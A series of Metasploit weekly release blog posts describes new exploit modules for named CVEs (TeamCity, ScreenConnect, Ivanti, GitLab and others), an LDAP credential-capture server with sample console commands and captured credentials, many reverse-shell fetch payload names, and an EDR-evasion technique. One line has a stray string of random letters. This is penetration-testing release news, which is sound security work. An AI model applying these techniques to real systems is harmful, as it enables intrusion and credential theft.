and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro

Metasploit Wrap-Up 03/15/2024

Post Syndicated from Zachary Goldman original https://blog.rapid7.com/2024/03/15/metasploit-wrap-up-03-15-24/

New module content (3)

GitLab Password Reset Account Takeover

Metasploit Wrap-Up 03/15/2024

Authors: asterion04 and h00die
Type: Auxiliary
Pull request: #18716 contributed by h00die
Path: admin/http/gitlab_password_reset_account_takeover
AttackerKB reference: CVE-2023-7028

Description: This adds an exploit module that leverages an account-take-over vulnerability to take control of a GitLab account without user interaction. The vulnerability lies in the password reset functionality as it’s possible to provide two email addresses so that
the reset code will be sent to both. It is therefore possible to provide the email
address of the target account as well as that of one we control, and to reset the password.

MinIO Bootstrap Verify Information Disclosure

Authors: RicterZ and joel <joel @ ndepthsecurity>
Type: Auxiliary
Pull request: #18775 contributed by 6a6f656c
Path: gather/minio_bootstrap_verify_info_disc
AttackerKB reference: CVE-2023-28432

Description: This adds an auxiliary module that leverages an information disclosure (CVE-2023-28432) in a cluster deployment of MinIO versions from RELEASE.2019-12-17T23-16-33Z and prior to RELEASE.2023-03-20T20-16-18Z. This retrieves all environment variables, including MINIO_SECRET_KEY and MINIO_ROOT_PASSWORD.

JetBrains TeamCity Unauthenticated Remote Code Execution

Author: sfewer-r7
Type: Exploit
Pull request: #18922 contributed by sfewer-r7
Path: multi/http/jetbrains_teamcity_rce_cve_2024_27198
AttackerKB reference: CVE-2024-27198

Description: This adds an exploit module that leverages an authentication bypass vulnerability in JetBrains TeamCity (CVE-2024-27198) to achieve unauthenticated RCE. The authentication bypass enables access to the REST API and creates a new administrator access token. This token can be used to upload a plugin which contains a Metasploit payload.

Enhancements and features (5)

  • #18835 from zgoldman-r7 – This PR reduces code duplication in the modules/exploits/windows/mssql/mssql_payload module.
  • #18899 from zeroSteiner – Updates the tools/payloads/ysoserial/dot_net.rb tool to add options for encoding the resulting payload as a viewstate.
  • #18930 from dwelch-r7 – This PR adds the ability to run a help command from within the interactive SQL prompt.
  • #18931 from cgranleese-r7 – Adds additional help information when interacting with an SQL session.
  • #18932 from adfoster-r7 – This PR adds PostgreSQL session type acceptance tests using Allure report generation as well as a local test module.

Bugs fixed (5)

  • #18944 from zeroSteiner – This fixes an issue when saving and loading DNS rules from the config.
  • #18945 from adfoster-r7 – Fixes an issue that caused a crash when running http crawler with database connected.
  • #18949 from zeroSteiner – This updates the DNS feature to notify the user a restart is required when the feature is enabled or disabled.
  • #18952 from cgranleese-r7 – Updates Postgres hashdump module to now work with newer versions of Postgres.
  • #18954 from adfoster-r7 – This PR fixes an issue where modules were not honoring spooler settings.

Documentation added (3)

  • #18868 from zeroSteiner – This adds documentation for the new DNS command.
  • #18937 from jjoshm – Fixes a typo in the Kerberos documentation.
  • #18951 from adfoster-r7 – This PR improves documentation on running Postgres acceptance tests locally.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro

Metasploit Wrap-Up 03/08/2024

Post Syndicated from Jacquie Harris original https://blog.rapid7.com/2024/03/08/metasploit-wrap-up-03-08-2024/

New module content (2)

GitLab Tags RSS feed email disclosure

Metasploit Wrap-Up 03/08/2024

Authors: erruquill and n00bhaxor
Type: Auxiliary
Pull request: #18821 contributed by n00bhaxor
Path: gather/gitlab_tags_rss_feed_email_disclosure
AttackerKB reference: CVE-2023-5612

Description: This adds an auxiliary module that leverages an information disclosure vulnerability (CVE-2023-5612) in Gitlab versions before 16.6.6, 16.7 prior to 16.7.4, and 16.8 prior to 16.8.1 to retrieve user email addresses via tags feed.

BoidCMS Command Injection

Authors: 1337kid and bwatters-r7
Type: Exploit
Pull request: #18827 contributed by bwatters-r7
Path: multi/http/cve_2023_38836_boidcms
AttackerKB reference: CVE-2023-38836

Description: This PR adds an authenticated RCE against BoidCMS versions 2.0.0 and earlier. The underlying issue in the vulnerability CVE-2023-38836 is that the file upload check allows a php file to be uploaded and executes as a media file if the GIF header is present in the PHP file.

Enhancements and features (11)

  • #18686 from h00die – This updates the existing auxiliary/scanner/ssh/ssh_version module with new checks for supported cryptographic algorithms and version detection capabilities.
  • #18715 from errorxyz – This adds a Splunk library for use by future modules. It also updates the existing exploit/multi/http/splunk_privilege_escalation_cve_2023_32707 module to use it.
  • #18796 from errorxyz – This updates the ManageEngine Endpoint Central and ServiceDesk Plus RCE modules for CVE-2022-47966. Particularly, it adds a Java target to be able to use Java-based payloads.
  • #18862 from sjanusz-r7 – This PR aligns the client’s peerhost and peerport API for the recently added SQL-based sessions (postgres, mssql, mysql).
  • #18875 from dwelch-r7 – This PR adds conditional validation of options depending on the chosen connection type, so for example if you want to connect via RHOST we also check (where applicable) that RPORT or the USERNAME is set. When a connection is made over an existing SESSION we can still allow the user to only set SESSION and not worry about the missing values only required for a new RHOST connection.
  • #18887 from cgranleese-r7 – Updates the search command to now search modules that are compatible with a specified session type, for instance: search session_type:meterpreter or search session_type:smb.
  • #18903 from sjanusz-r7 – This PR improves the UX by correctly handling databases changes by updating the prompt to now get the appropriate database value in the context of a MySQL or MSSQL session.
  • #18905 from cgranleese-r7 – Improves the pwd command output for SMB sessions.
  • #18908 from adfoster-r7 – Update SAMR computer and ICPR cert to support SMB sessions.
  • #18921 from dwelch-r7 – This adds the IP address to the SMB session prompt when there is no selected share.
  • #18926 from cgranleese-r7 – Update sessions to have a consistent set of local file system commands.

Bugs fixed (5)

  • #18844 from sfewer-r7 – This fixes a bug in the file dropper mixin that would prevent files from being deleted with a Windows shell session.
  • #18897 from adfoster-r7 – Updates the smb_login module to support configuring the negotiated SMB protocol versions and whether encryption is negotiated.
  • #18904 from double16 – Fixes the windows/gather/bloodhound module to no longer incorrectly validate the OutputDirectory option.
  • #18920 from dwelch-r7 – This PR fixes an issue with the autorunscript module option within an SMB session.
  • #18928 from dwelch-r7 – This PR fixes an issue when running the auxiliary/gather/windows_secrets_dump module while using the SESSION module option to connect, that caused the client to be disconnected and unable to be reused for subsequent runs/other modules.

Documentation (1)

  • #18929 from adfoster-r7 – Updates the Metasploit API documentation library to the latest available version to avoid CVE-2024-27285 – an XSS in the default YARD template. Thanks to Aviv Keller for reporting.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro

Metasploit Weekly Wrap-Up 03/01/2024

Post Syndicated from Christophe De La Fuente original https://blog.rapid7.com/2024/03/01/metasploit-weekly-wrap-up-03-01-2024/

Connect the dots from authentication bypass to remote code execution

Metasploit Weekly Wrap-Up 03/01/2024

This week, our very own sfewer-r7 added a new exploit module that leverages an authentication bypass vulnerability in ConnectWise ScreenConnect to achieve remote code execution. This vulnerability, CVE-2024-1709, affects all versions of ConnectWise ScreenConnect up to and including 23.9.7.The module creates a new administrator user account on the server, which is used it to upload a malicious extension (.ashx file) and get code execution as the NT AUTHORITY\SYSTEM user on Windows or root user on Linux, depending on the target platform.

New module content (1)

ConnectWise ScreenConnect Unauthenticated Remote Code Execution

Authors: WatchTowr and sfewer-r7
Type: Exploit
Pull request: #18870 contributed by sfewer-r7
Path: multi/http/connectwise_screenconnect_rce_cve_2024_1709

Description: This PR adds an unauthenticated RCE exploit for ConnectWise ScreenConnect (CVE-2024-1709).

Enhancements and features (8)

  • #18830 from sjanusz-r7 – Aligns the behavior of the MSSQL, PostgreSQL, and MySQL sessions. This functionality is currently behind a feature flag enabled with the features command.
  • #18833 from zeroSteiner – This catches an exception when updating a non-existing session. Prior to this PR, trying to run ‘sessions -k’ after running ‘workspace -D’ would result in a stack trace being printed to the console. This resolves issue #18561.
  • #18849 from adfoster-r7 – Adjusts the logic used for the visual indentation of tables.
  • #18872 from zgoldman-r7 – Updates the MSSQL modules to support querying database rows that contain boolean bit values.
  • #18878 from adfoster-r7 – This updates a number of rspec gems which help improve test suite error messages when string encodings are different.
  • #18879 from zeroSteiner – Updates the auxiliary/admin/kerberos/inspect_ticket module with improved error messages and support for printing Kerberos PAC credential information.
  • #18892 from zeroSteiner – Allows users to leverage the latest ADCS ESC13 technique. These changes are related to the identification of misconfigured certificate templates and workflow documentation. ldap_esc_vulnerable_cert_finder and ldap_query were also updated to improve usability.
  • #18893 from sjanusz-r7 – Updates the help command to visually align command names to the same width to improve readability.

Bugs fixed (2)

  • #18873 from cgranleese-r7 – Fixes a regression that caused a CreateSession option to be available for payloads that did not make sense.
  • #18880 from jmartin-tech – Fixes a bug with the auxiliary/capture/ldap module’s handling of NTLM hashes.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro

Metasploit Weekly Wrap-Up 02/23/2024

Post Syndicated from Spencer McIntyre original https://blog.rapid7.com/2024/02/23/metasploit-weekly-wrap-up-02-23-2024/

LDAP Capture module

Metasploit Weekly Wrap-Up 02/23/2024

Metasploit now has an LDAP capture module thanks to the work of llcjngdjttrvddchfntdbinjblktjjetrtifdlibuchh
JustAnda7. This work was completed as part of the Google Summer of Code program.

When the module runs it will by default require privileges to listen on port 389. The module implements a default implementation for BindRequest, SearchRequest, UnbindRequest, and will capture both plaintext credentials and NTLM hashes which can be brute-forced offline. Upon receiving a successful Bind Request, a ldap_bind: Authentication method not supported (7) error is sent to the connecting client.

The module can be with run:

msf6 > use auxiliary/server/capture/ldap
msf6 auxiliary(server/capture/ldap) > run

Incoming requests will have their credentials stored for later use:

[+] LDAP Login attempt => From:10.0.2.15:48198 Username:User Password:Pass
[+] LDAP Login Attempt => From:127.0.0.1:55566	 Username:admin	 ntlm_hash::8aa0e517cd547b4032ff7e9c5359c200879aa5a8031d3d74	 Domain:DOMAIN

These values will be stored in the database for later retrieval:

msf6 auxiliary(server/capture/ldap) > creds
Credentials
===========
host       origin     service         public  private  realm        private_type  JtR Format
----       ------     -------         ------  -------  -----        ------------  ----------
10.0.2.15  10.0.2.15  389/tcp (ldap)  User    Pass     example.com  Password      

Ivanti exploit module

Another honorable mention for this week’s Metasploit release is a module by sfewer-r7 that chains two recently disclosed vulnerabilities(CVE-2024-21893 and CVE-2024-21887) in Ivanti gateways to achieve remote code execution on a vulnerable target. The vulnerabilities are both being widely exploited in the wild. Read Rapid7’s full technical analysis of the exploit chain in AttackerKB.

New module content (4)

Authentication Capture: LDAP

Author: JustAnda7
Type: Auxiliary
Pull request: #18678 contributed by jmartin-tech
Path: server/capture/ldap

Description: Adds a new auxiliary/server/capture/ldap module that emulates an LDAP Server. The server accepts a user’s bind request, and the user credentials or NTLM hash is then captured, logged, and persisted to the currently active database. An ldap_bind: Authentication method not supported (7) error is sent to the connecting client.

Ivanti Connect Secure Unauthenticated Remote Code Execution

Author: sfewer-r7
Type: Exploit
Pull request: #18792 contributed by sfewer-r7
Path: linux/http/ivanti_connect_secure_rce_cve_2024_21893
AttackerKB references: CVE-2024-21887, CVE-2023-36661, CVE-2024-21893

Description: This module exploits the recently disclosed SSRF vulnerability (CVE-2024-21893) in Ivanti Connect Secure and Ivanti Policy Secure. The SSRF is chained to a command injection vulnerability (CVE-2024-21887) to achieve unauthenticated RCE.

Kafka UI Unauthenticated Remote Command Execution via the Groovy Filter option.

Authors: BobTheShopLifter and Thingstad and h00die-gr3y [email protected]
Type: Exploit
Pull request: #18700 contributed by h00die-gr3y
Path: linux/http/kafka_ui_unauth_rce_cve_2023_52251
AttackerKB reference: CVE-2023-52251

Description: This PR adds an exploit module for a command injection vulnerability that exists in Kafka-ui between v0.4.0 and v0.7.1 that allows an attacker to inject and execute arbitrary shell commands via the groovy filter parameter at the topic section.

QNAP QTS and QuTS Hero Unauthenticated Remote Code Execution in quick.cgi

Authors: Spencer McIntyre, jheysel-r7, and sfewer-r7
Type: Exploit
Pull request: #18832 contributed by sfewer-r7
Path: linux/http/qnap_qts_rce_cve_2023_47218
AttackerKB reference: CVE-2023-47218

Description: The PR adds a module targeting CVE-2023-47218, an unauthenticated command injection vulnerability affecting QNAP QTS and QuTH Hero devices. CVE-2023-47218 was discovered and disclosed by Stephen Fewer.

Enhanced Modules (2)

Modules which have either been enhanced, or renamed:

  • #18125 from JustAnda7 – This PR adds a module to launch an LDAP service supporting capture and storage of Simple Authentication attempts. When launching this module with default options users must have permissions to bind to port 389.
  • #18681 from h00die – This PR updates the pre-existing apache_ofbiz_deserialization module to include functionality that will bypass authentication by using the newly discovered auth-bypass vulnerability: CVE-2023-51467.

Enhancements and features (8)

  • #18376 from JustAnda7 – This PR adds support for LDAP capture of NTLM authentication and adds a default implementation for LDAP BindRequest, SearchRequest, UnbindRequest, as well as a default action for unsupported requests.
  • #18817 from dwelch-r7 – This PR adds support to now bucket module options that are output after running the options command. This will be for modules that support either an RHOST or a SESSION connection to show that only one or the other is required when using the new session type features for SMB/MSSQL/MYSQL/PostgreSQL sessions.
  • #18847 from sjanusz-r7 – This PR adds proxy support for getting a PostgreSQL session via the postgres_login module.
  • #18848 from sjanusz-r7 – This PR adds proxy support for getting a MSSQL session via the mssql_login module.
  • #18854 from sjanusz-r7 – This PR adds proxy support for getting a MySQL session via the mysql_login module.
  • #18855 from sjanusz-r7 – This PR removes the cwd convention from SQL-based sessions, and instead uses a more appropriate def database_name computed value rather than a cached variable.
  • #18863 from sjanusz-r7 – This PR adds in the ENVCHANGE types to the MSSQL client mixin, and uses those to fetch the initial DB name received from the server.
  • #18864 from cgranleese-r7 – Adds an alias for ls and dir inside SMB sessions.

Bugs fixed (5)

  • #18770 from dwelch-r7 – Fixes a bug when multiple new session types (SMB, PostgreSQL, MSSQL, MySQL) were enabled with the features set postgresql_session_type true command.
  • #18842 from upsidedwn – Updates the Metasploit Dockerfile to correctly honor user provided bundler config arguments.
  • #18850 from adfoster-r7 – Fixes failing ldap server tests.
  • #18861 from cgranleese-r7 – Removes SessionType values from modules with OptionalSession mixin.
  • #18871 from adfoster-r7 – Fixes a crash when using the webconsole.

Documentation added (1)

  • #18857 from jlownie – Updates the Wiki documentation on running the Metasploit database to be more clear.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro

Metasploit Weekly Wrap-Up 02/16/2024

Post Syndicated from Spencer McIntyre original https://blog.rapid7.com/2024/02/16/metasploit-weekly-wrap-up-02-16-2024/

New Fetch Payload

Metasploit Weekly Wrap-Up 02/16/2024

It has been almost a year since Metasploit released the new fetch payloads and since then, 43 of the 79 exploit modules have had support for fetch payloads. The original payloads supported transferring the second stage over HTTP, HTTPS and FTP. This week, Metasploit has expanded that protocol support to include SMB, allowing payloads to be run using rundll32 which has the added benefit of capturing the NetNTLM hashes of the requestor.

This also streamlines the workflow the user would have previously used by first starting the exploit/windows/smb/smb_delivery module, and then copying the command into another exploit. Now the user can simply select one of the SMB-enabled fetch payloads and Metasploit will manage the service and generate the command.

As an added benefit, since #18680 merged into Metasploit, multiple SMB services can be run simultaneously. This means that multiple SMB-enabled fetch payloads can have their own independent handlers running at the same time.

New module content (2)

Base64 Command Encoder

Author: Spencer McIntyre
Type: Encoder
Pull request: #18807 contributed by zeroSteiner

Description: This adds a new encoder module that leverages base64 encoding to escape bad characters in ARCH_CMD payloads for the Linux and UNIX platforms.

SMB Fetch, Windows shellcode stage, Windows x64 IPv6 Bind TCP Stager

Authors: Spencer McIntyre, bwatters-r7, and sf [email protected]
Type: Payload (Adapter)
Pull request: #18664 contributed by zeroSteiner

Description: This adds an SMB fetch-payload service and a new payload to use it. The payload invokes rundll32 but handles everything for the user automatically.

This adapter adds the following payloads:

  • cmd/windows/smb/x64/custom/bind_ipv6_tcp
  • cmd/windows/smb/x64/custom/bind_ipv6_tcp_uuid
  • cmd/windows/smb/x64/custom/bind_named_pipe
  • cmd/windows/smb/x64/custom/bind_tcp
  • cmd/windows/smb/x64/custom/bind_tcp_rc4
  • cmd/windows/smb/x64/custom/bind_tcp_uuid
  • cmd/windows/smb/x64/custom/reverse_http
  • cmd/windows/smb/x64/custom/reverse_https
  • cmd/windows/smb/x64/custom/reverse_named_pipe
  • cmd/windows/smb/x64/custom/reverse_tcp
  • cmd/windows/smb/x64/custom/reverse_tcp_rc4
  • cmd/windows/smb/x64/custom/reverse_tcp_uuid
  • cmd/windows/smb/x64/custom/reverse_winhttp
  • cmd/windows/smb/x64/custom/reverse_winhttps
  • cmd/windows/smb/x64/encrypted_shell/reverse_tcp
  • cmd/windows/smb/x64/encrypted_shell_reverse_tcp
  • cmd/windows/smb/x64/exec
  • cmd/windows/smb/x64/loadlibrary
  • cmd/windows/smb/x64/messagebox
  • cmd/windows/smb/x64/meterpreter/bind_ipv6_tcp
  • cmd/windows/smb/x64/meterpreter/bind_ipv6_tcp_uuid
  • cmd/windows/smb/x64/meterpreter/bind_named_pipe
  • cmd/windows/smb/x64/meterpreter/bind_tcp
  • cmd/windows/smb/x64/meterpreter/bind_tcp_rc4
  • cmd/windows/smb/x64/meterpreter/bind_tcp_uuid
  • cmd/windows/smb/x64/meterpreter/reverse_http
  • cmd/windows/smb/x64/meterpreter/reverse_https
  • cmd/windows/smb/x64/meterpreter/reverse_named_pipe
  • cmd/windows/smb/x64/meterpreter/reverse_tcp
  • cmd/windows/smb/x64/meterpreter/reverse_tcp_rc4
  • cmd/windows/smb/x64/meterpreter/reverse_tcp_uuid
  • cmd/windows/smb/x64/meterpreter/reverse_winhttp
  • cmd/windows/smb/x64/meterpreter/reverse_winhttps
  • cmd/windows/smb/x64/meterpreter_bind_named_pipe
  • cmd/windows/smb/x64/meterpreter_bind_tcp
  • cmd/windows/smb/x64/meterpreter_reverse_http
  • cmd/windows/smb/x64/meterpreter_reverse_https
  • cmd/windows/smb/x64/meterpreter_reverse_ipv6_tcp
  • cmd/windows/smb/x64/meterpreter_reverse_tcp
  • cmd/windows/smb/x64/peinject/bind_ipv6_tcp
  • cmd/windows/smb/x64/peinject/bind_ipv6_tcp_uuid
  • cmd/windows/smb/x64/peinject/bind_named_pipe
  • cmd/windows/smb/x64/peinject/bind_tcp
  • cmd/windows/smb/x64/peinject/bind_tcp_rc4
  • cmd/windows/smb/x64/peinject/bind_tcp_uuid
  • cmd/windows/smb/x64/peinject/reverse_named_pipe
  • cmd/windows/smb/x64/peinject/reverse_tcp
  • cmd/windows/smb/x64/peinject/reverse_tcp_rc4
  • cmd/windows/smb/x64/peinject/reverse_tcp_uuid
  • cmd/windows/smb/x64/pingback_reverse_tcp
  • cmd/windows/smb/x64/powershell_bind_tcp
  • cmd/windows/smb/x64/powershell_reverse_tcp
  • cmd/windows/smb/x64/powershell_reverse_tcp_ssl
  • cmd/windows/smb/x64/shell/bind_ipv6_tcp
  • cmd/windows/smb/x64/shell/bind_ipv6_tcp_uuid
  • cmd/windows/smb/x64/shell/bind_named_pipe
  • cmd/windows/smb/x64/shell/bind_tcp
  • cmd/windows/smb/x64/shell/bind_tcp_rc4
  • cmd/windows/smb/x64/shell/bind_tcp_uuid
  • cmd/windows/smb/x64/shell/reverse_tcp
  • cmd/windows/smb/x64/shell/reverse_tcp_rc4
  • cmd/windows/smb/x64/shell/reverse_tcp_uuid
  • cmd/windows/smb/x64/shell_bind_tcp
  • cmd/windows/smb/x64/shell_reverse_tcp
  • cmd/windows/smb/x64/vncinject/bind_ipv6_tcp
  • cmd/windows/smb/x64/vncinject/bind_ipv6_tcp_uuid
  • cmd/windows/smb/x64/vncinject/bind_named_pipe
  • cmd/windows/smb/x64/vncinject/bind_tcp
  • cmd/windows/smb/x64/vncinject/bind_tcp_rc4
  • cmd/windows/smb/x64/vncinject/bind_tcp_uuid
  • cmd/windows/smb/x64/vncinject/reverse_http
  • cmd/windows/smb/x64/vncinject/reverse_https
  • cmd/windows/smb/x64/vncinject/reverse_tcp
  • cmd/windows/smb/x64/vncinject/reverse_tcp_rc4
  • cmd/windows/smb/x64/vncinject/reverse_tcp_uuid
  • cmd/windows/smb/x64/vncinject/reverse_winhttp
  • cmd/windows/smb/x64/vncinject/reverse_winhttps

Enhancements and features (7)

  • #18706 from sjanusz-r7 – Updates multiple PostgreSQL modules to now work with PostgreSQL sessions. This functionality is behind a feature flag which can be enabled with features set postgres_session_type true.
  • #18747 from zgoldman-r7 – Updates the auxiliary/scanner/mssql/mssql_login module with a new CreateSession option which controls the opening of an interactive MSSQL session. This functionality is currently behind a feature flag which can be enabled with features set mssql_session_type true.
  • #18759 from cgranleese-r7 – Updates the multiple MySQL modules to work with a provided MySQL session instead of opening a new connection. This functionality is behind a feature flag which can be enabled with features set mysql_session_type true.
  • #18763 from zgoldman-r7 – Updates multiple MSSQL modules to now work with the new MSSQL session type that is enabled with features set mssql_session_type true.
  • #18806 from cgranleese-r7 – Improves unknown command handling by suggesting similar valid commands.
  • #18809 from zeroSteiner – Makes multiple improvements to the dns command – a new command which mimics the functionality of /etc/resolv.conf and /etc/hosts. This functionality is currently behind a feature flag which can be enabled with features set dns_feature true in msfconsole.
  • #18825 from cgranleese-r7 – Improves the error messages when the current session is not compatible with a post module.

Bugs fixed (13)

  • #18616 from adfoster-r7 – This fixes an issue with the AARCH64 SO ELF template that was causing SIGBUS exceptions to be raised.
  • #18774 from adfoster-r7 – Updates the following modules to now work with newer versions of sqlcmd:
    post/windows/gather/credentials/mssql_local_hashdump and post/windows/manage/mssql_local_auth_bypass.
  • #18786 from lihe07 – This fixes an option name collision between the exploit/linux/local/service_persistence when the payload is set to cmd/unix/reverse_netcat. The option to set the writable path is now BACKDOOR_PATH.
  • #18795 from cgranleese-r7 – Moves the CreateSession option from advanced into basic options for modules, in order to increase discoverability.
  • #18798 from upsidedwn – This fixes an issue in the exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move module’s check method that was causing version comparisons to fail.
  • #18799 from upsidedwn – This fixes an issue in the exploit/windows/local/cve_2020_17136 module’s check method that was causing version comparisons to fail.
  • #18800 from upsidedwn – This fixes an issue in the exploit/windows/local/cve_2021_40449 module’s check method that was causing version comparisons to fail.
  • #18801 from upsidedwn – This fixes an issue in the exploit/windows/local/cve_2022_26904_superprofile module’s check method that was causing version comparisons to fail.
  • #18812 from adfoster-r7 – Reverts the auxiliary/scanner/mssql/mssql_login modules’s TDSENCRYPTION default value to false.
  • #18813 from adfoster-r7 – Fixes a crash when running the help services or help hosts commands.
  • #18823 from cdelafuente-r7 – Fix module metadata platform list comparison.
  • #18826 from dwelch-r7 – Fixes a regression where the windows/smb/psexec module was not correctly performing cleanup logic.
  • #18828 from dwelch-r7 – Fixes a crash when exploit modules used nops.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro

Metasploit Weekly Wrap-Up 02/09/2024

Post Syndicated from Jack Heysel original https://blog.rapid7.com/2024/02/09/metasploit-weekly-wrap-up-02-09-2024/

Go go gadget Fortra GoAnywhere MFT Module

Metasploit Weekly Wrap-Up 02/09/2024

This Metasploit release contains a module for one of 2024’s hottest vulnerabilities to date: CVE-2024-0204. The path traversal vulnerability in Fortra GoAnywhere MFT allows for unauthenticated attackers to access the InitialAccountSetup.xhtml endpoint which is used during the products initial setup to create the first administrator user. After setup has completed, this endpoint is supposed to be no longer available. Attackers can use this vulnerability to create a user with Administrator privileges. Once Administrative privileges have been obtained for the GoAnywhere MFT application, uploading a .jsp payload in order to achieve RCE is trivial.

New module content (3)

runc (docker) File Descriptor Leak Privilege Escalation

Authors: Rory McNamara and h00die
Type: Exploit
Pull request: #18780 contributed by h00die
Path: linux/local/runc_cwd_priv_esc

Description: This adds a local privilege escalation exploit that leverages an internal file descriptor leak in runc versions prior to 1.1.12. An attacker with docker privileges is able write an arbitrary file on the host file system with the permissions of runc (typically root). With this, the module uploads a payload, sets the execute and the SUID permissions to escalate privileges.

Cacti RCE via SQLi in pollers.php

Authors: Aleksey Solovev and Christophe De La Fuente
Type: Exploit
Pull request: #18769 contributed by cdelafuente-r7
Path: multi/http/cacti_pollers_sqli_rce

Description: This PR adds an exploit module which leverages a SQLi (CVE-2023-49085) and a LFI (CVE-2023-49084) vulnerability in Cacti versions prior to 1.2.26 to achieve RCE.

Fortra GoAnywhere MFT Unauthenticated Remote Code Execution

Authors: James Horseman, Zach Hanley, and sfewer-r7
Type: Exploit
Pull request: #18762 contributed by sfewer-r7
Path: multi/http/fortra_goanywhere_mft_rce_cve_2024_0204

Description: This pull request adds an exploit module for CVE-2024-0204 which is a path traversal vulnerability which results in unauthenticated RCE in Fortra GoAnywhere MFT. GoAnywhere MFT versions 6.x from 6.0.1, and 7.x before 7.4.1 are vulnerable.

Enhancements and features (3)

  • #18696 from zgoldman-r7 – Introduces a standalone MSSQL client class that can be used in new contexts not tied to a specific module.
  • #18718 from cgranleese-r7 – Updates the auxiliary/scanner/mysql/mysql_login.rb module to include a new CreateSession option that opens an interactive session. This functionality is currently behind a feature flag which can be enabled with features set mysql_session_type true.
  • #18761 from dwelch-r7 – Adds a user notification that new modules support a CreateSession option. This functionality is currently behind a feature flag which can be enabled with the features command.

Bugs fixed (3)

  • #18704 from dwelch-r7 – Fixes a bug with framework having 0 registered nop modules when the defer-module-loads feature was enabled.
  • #18773 from sjanusz-r7 – Fixes an issue where Ctrl+Z and Ctrl+C when in the context of an interactive PostgreSQL shell prompt inside the PostgreSQL session type did work correctly.
  • #18803 from dwelch-r7 – Fixes a crash when using exploit/multi/handler with an invalid payload name.

Documentation added (1)

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro

Metasploit Weekly Wrap-Up 02/02/2024

Post Syndicated from Simon Janusz original https://blog.rapid7.com/2024/02/02/metasploit-weekly-wrap-up-02-02-2024/

Shared RubySMB Service Improvements

Metasploit Weekly Wrap-Up 02/02/2024

This week’s updates include improvements to Metasploit Framework’s SMB server implementation: the SMB server can now be reused across various SMB modules, which are now able to register their own unique shares and files. SMB modules can also now be executed concurrently. Currently, there are 15 SMB modules in Metasploit Framework that utilize this feature.

New module content (2)

Mirth Connect Deserialization RCE

Authors: Naveen Sunkavally, Spencer McIntyre, and r00t
Type: Exploit
Pull request: #18755 contributed by zeroSteiner
Path: multi/http/mirth_connect_cve_2023_43208

Description: This PR adds an exploit module for Mirth Connect. Versions < 4.4.1 are vulnerable to CVE-2023-43208 and CVE-2023-37679, where the former is a patch bypass for the latter. In both cases, an attacker can execute an OS command in the context of the target service using a specially crafted HTTP request and Java deserialization gadget. A technical analysis of CVE-2023-37679 is available in AttackerKB.

Puppet Config Gather

Author: h00die
Type: Post
Pull request: #18628 contributed by h00die
Path: linux/gather/puppet

Description: This PR adds a post gather module to get Puppet configs and other sensitive files.

Enhancements and features (2)

  • #18680 from zeroSteiner – This adds a service compatible with Rex::ServiceManager for SMB that can be shared among modules.
  • #18742 from sjanusz-r7 – Enhances the post/multi/gather/memory_search with additional UX improvements such as outputting a list of matched processes that are being targeted, as well as improved error handling if the process architecture is not correct.

Bugs fixed (2)

  • #18750 from adfoster-r7 – Updates the to_handler command for payload modules to support option overrides. The to_handler command is a convenient way of using multi/handler, setting the payload, and setting datastore options.
  • #18760 from adfoster-r7 – Fixes an issue where Metasploit fails to start when resolv.conf cannot be found.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro

Metasploit Weekly Wrap-Up 01/26/24

Post Syndicated from Alan David Foster original https://blog.rapid7.com/2024/01/26/metasploit-weekly-wrap-up-01-26-24/

Direct Syscalls Support for Windows Meterpreter

Metasploit Weekly Wrap-Up 01/26/24

Direct system calls are a well-known technique that is often used to bypass EDR/AV detection. This technique is particularly useful when dynamic analysis is performed, where the security software monitors every process on the system to detect any suspicious activity. One common way to do so is to add user-land hooks on Win32 API calls, especially those commonly used by malware. Direct syscalls are a way to run system calls directly and enter kernel mode without passing through the Win32 API.

This first implementation focuses on substituting the Win32 API calls used by the Reflective DLL Injection (RDI) library with Direct Syscalls to the corresponding Native API’s. For example, VirtualAlloc has been substituted by a system call to ZwAllocateVirtualMemory. Since RDI is used everywhere by Meterpreter and its extensions, it was a very good candidate for this initial work.

